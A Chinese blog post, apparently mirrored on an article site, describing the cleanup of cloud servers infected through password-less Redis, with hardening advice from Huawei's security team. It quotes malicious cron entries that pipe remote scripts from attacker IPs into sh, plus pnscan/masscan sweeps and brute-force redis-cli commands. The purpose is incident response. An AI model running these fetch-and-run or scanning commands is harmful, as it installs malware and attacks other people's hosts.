美文网首页
华为云阿里云因redis未设置密码中毒

华为云阿里云因redis未设置密码中毒

作者: 王侦 | 来源:发表于2019-11-28 12:29 被阅读0次

1.中毒特征

有跑满100%CPU的进程notlsb notlsa


[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux|grep notlsb
root      9710  0.0  0.0 112712   968 pts/1    S+   12:20   0:00 grep --color=auto notlsb
root     13009 48.1  0.2  39804  5420 ?        Ssl  Nov26 1149:03 ./notlsb

杀死后,发现一个pnscan进程,杀不死

[root@ecs-s6-large-2-linux-20191113142903 ~]# ps aux|grep pnscan
root      7471  3.7  0.0 9481936  928 ?        Sl   11:50   0:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 66 6f 0d 0a 198.234.0.0/16 6379


[root@ecs-s6-medium-2-linux-20191116090109 ~]# ps aux |grep masscan
root      6762  2.5  2.0 201960 38744 ?        Sl   12:24   0:00 masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16

crontab -e

//"/tmp/crontab.F4Macp"
*/15 * * * * curl -fsSL 122.51.164.83:7770/ash.sh|sh

有大量redis-cli进程:

[root@ecs-s6-large-2-linux-20191113142903 redis-4.0.14]# ps -ef |grep redis-cli
root      5751 28428  0 12:13 pts/1    00:00:00 grep --color=auto redis-cli
root     22237     1  0 11:53 ?        00:00:00 redis-cli -h 103.219.179.235 -p 6379 --raw
root     22253     1  0 11:53 ?        00:00:00 redis-cli -h 103.219.179.235 -p 6379 -a 123456 --raw
root     22303     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a oracle --raw
root     22305     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a password --raw
root     22309     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123 --raw
root     22311     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a abc123! --raw
root     22315     1  0 11:53 ?        00:00:00 redis-cli -h 103.40.26.42 -p 6379 -a admin --raw
root     22397     1  0 11:53 ?        00:00:00 redis-cli -h 112.29.172.234 -p 6379 --raw
root     22401     1  0 11:53 ?        00:00:00 redis-cli -h 112.29.172.234 -p 6379 -a root --raw
root     22481     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a root --raw
root     22487     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a p@aaw0rd --raw
root     22491     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a abc123! --raw
root     22493     1  0 11:53 ?        00:00:00 redis-cli -h 118.184.159.50 -p 6379 -a 123456 --raw
root     22597     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 --raw
root     22599     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a redis --raw
root     22601     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a root --raw
root     22603     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a oracle --raw
root     22605     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a password --raw
root     22607     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a p@aaw0rd --raw
root     22609     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123 --raw
root     22611     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a abc123! --raw
root     22614     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a 123456 --raw
root     22616     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.39.193 -p 6379 -a admin --raw
root     22618     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 --raw
root     22620     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a redis --raw
root     22622     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a root --raw
root     22624     1  0 11:53 ?        00:00:00 redis-cli -h 134.220.78.6 -p 6379 -a oracle --raw

/bin目录下的异常文件


这几个系统命令被篡改:


计划任务在下载木马:


/tmp下的木马文件


2.原因

通过redis 目前中毒的共同点就是安装了 redis 并且没有设置密码。 有人 利用redis的漏洞。固定在去请求阿里云的内网网ip。找有3306 端口,并且没有设置密码的 ecs。然后植入病毒。

3.解决方法

  • 1)删除了 root 用户下面你的所有定时任务。
crontab -u root -r 

rm -rf /usr/bin/dpkgd (ps netstat lsof ss)
rm -rf /usr/bin/bsd-port     #木马程序
rm -f /usr/bin/.sshd         #木马后门
rm -f /tmp/gates.lod
rm -f /tmp/moni.lod
rm -f /etc/rc.d/init.d/DbSecuritySpt(启动上述描述的那些木马变种程序)
rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc3.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc4.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc5.d/S97DbSecuritySpt
rm -f /etc/rc.d/init.d/selinux(默认是启动/usr/bin/bsd-port/getty)
rm -f /etc/rc.d/rc1.d/S99selinux
rm -f /etc/rc.d/rc2.d/S99selinux
rm -f /etc/rc.d/rc3.d/S99selinux
rm -f /etc/rc.d/rc4.d/S99selinux
rm -f /etc/rc.d/rc5.d/S99selinux

  • 2)不要用 默认端口还不设置密码
    在redis.conf 中 requirepass XXX

  • 3)批量杀死redis-cli进程

ps -ef |grep redis-cli|awk '{print $2}'|xargs kill -9

第一步 top 找到kdevtmpfsi的进程号

第二步 systemctl status 进程号

可以看到 kdevtmpfsi的父进程kinsing,和进程的启动位置路径

ok,把这两个依次kill掉,并且删除它们的源文件

rm -af /var/tmp/kinsing

rm -af /tmp/kdevtmpfsi

用命令 crontab -l 查看定时任务

cd到 /var/spool/cron/ 目录下,查看redis用户

cat redis:

REDIS0009   redis-ver5.0.2
redis-bits￀㨭eLĪused-mem¨H
preamble~Q

*/1 * * * * curl -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh

cd /var/spool/cron 查看是否有相关的木马定时任务在执行(root文件里面为定时任务)有的话删掉再重启下crontab(命令:systemctl restart crond.service)

后续操作:(找到文件,全部删除,若没有则无需操作
find / -name kdevtmpfsi

find / -name kinsing

4.后续


[root@ecs-s6-large-2-linux-20191113142903 .ssh]# ps -ef|grep sshd
root      2869     1  0 Nov13 ?        00:00:06 /usr/sbin/sshd -D
root      6380     1  0 Nov29 ?        00:00:00 /usr/bin/.sshd
root     10107  2869  0 15:19 ?        00:00:00 sshd: root@pts/6
root     20048     1  0 Dec09 ?        00:00:00 /usr/bin/.sshd
root     22857  2869  0 11:41 ?        00:00:00 sshd: root@pts/3
root     22881  2869  0 11:41 ?        00:00:00 sshd: root@pts/4
root     22996  2869  0 14:18 ?        00:00:00 sshd: root@pts/0
root     23018  2869  0 14:19 ?        00:00:00 sshd: root@pts/1
root     23078  2869  0 14:48 ?        00:00:00 sshd: root@pts/2
root     23080  2869  0 14:48 ?        00:00:00 sshd: root@notty
root     23115  2869  0 14:49 ?        00:00:00 sshd: root@pts/5
root     23117  2869  0 14:49 ?        00:00:00 sshd: root@notty

/tmp下的文件无法删除:
i :设定文件不能被删除、改名、设定链接关系,同时不能写入或新增内容;对目录

[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
----i--------e-- config.json
-------------e-- conf.n
-------------e-- notlsb
----i--------e-- sysupdate
----i--------e-- tmp.WhhpNAqNIg/notlsb
----i--------e-- tmp.XZYubjPJK3/notlsa
----i--------e-- wgeta
----i--------e-- wgetb


[root@ecs-s6-medium-2-linux-20191116090109 tmp]# chattr -R -i *
[root@ecs-s6-medium-2-linux-20191116090109 tmp]# lsattr *
-------------e-- conf.n
-------------e-- tmp.WhhpNAqNIg/notlsb
-------------e-- tmp.XZYubjPJK3/notlsa

ls /usr/bin/dpkgd/ #替换的工具,系统自带的工具正常不会在这个目录下,并且也不可用

netstat lsof ps ss

/usr/bin/bsd-port #后门程序

/usr/sbin/.sshd #判断是后门程序

5.华为安全人员的给出的建议

安全排查:
初步判断主机疑似因redis未授权访问漏洞被入侵(漏洞详情可参考链接:http://www.freebuf.com/vuls/85021.html),当前主机内异常文件已暂协助客户清除,为防止黑客留有其他后门,建议客户择机重装系统,重新部署应用,并对参考安全加固建议对主机进行安全加固。

安全加固建议:
1、部署redis建议修改默认端口或者限制IP访问,开启密码认证功能,并使用强密码。
2、启动安全组白名单策略,根据业务需求对外开放端口,关闭不必要开放的端口!对于特殊业务端口,建议设置固定的来源IP(如: 6379、22)或使用VPN、堡垒机建立自己的运维通道;
3、严格控制各服务的系统权限,各服务进程请不要以root权限运行;各应用(如WEB)同数据库交互的账号同样不要使用root权限的账号;
4、设置系统所有账号口令(包括系统账户和应用账户)为符合规范的强口令;
强口令设置要求参照:https://bbs.huaweicloud.com/blogs/87a98385ec6411e79fc57ca23e93a89f
5、建议定期做好数据备份(虚拟机内部备份,异地备份,云上云下备份等),避免被加密勒索;
6、为防御主机和应用方面潜在的安全风险,保护主机不遭受进一步破坏,建议使用华为云官方提供的企业主机安全或安全专家服务:
企业主机安全服务参照:https://www.huaweicloud.com/product/hss.html
安全专家服务参照:https://www.huaweicloud.com/product/ses.html

相关文章

网友评论

      本文标题:华为云阿里云因redis未设置密码中毒

      本文链接:https://www.haomeiwen.com/subject/daavwctx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|华为云阿里云因redis未设置密码中毒|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!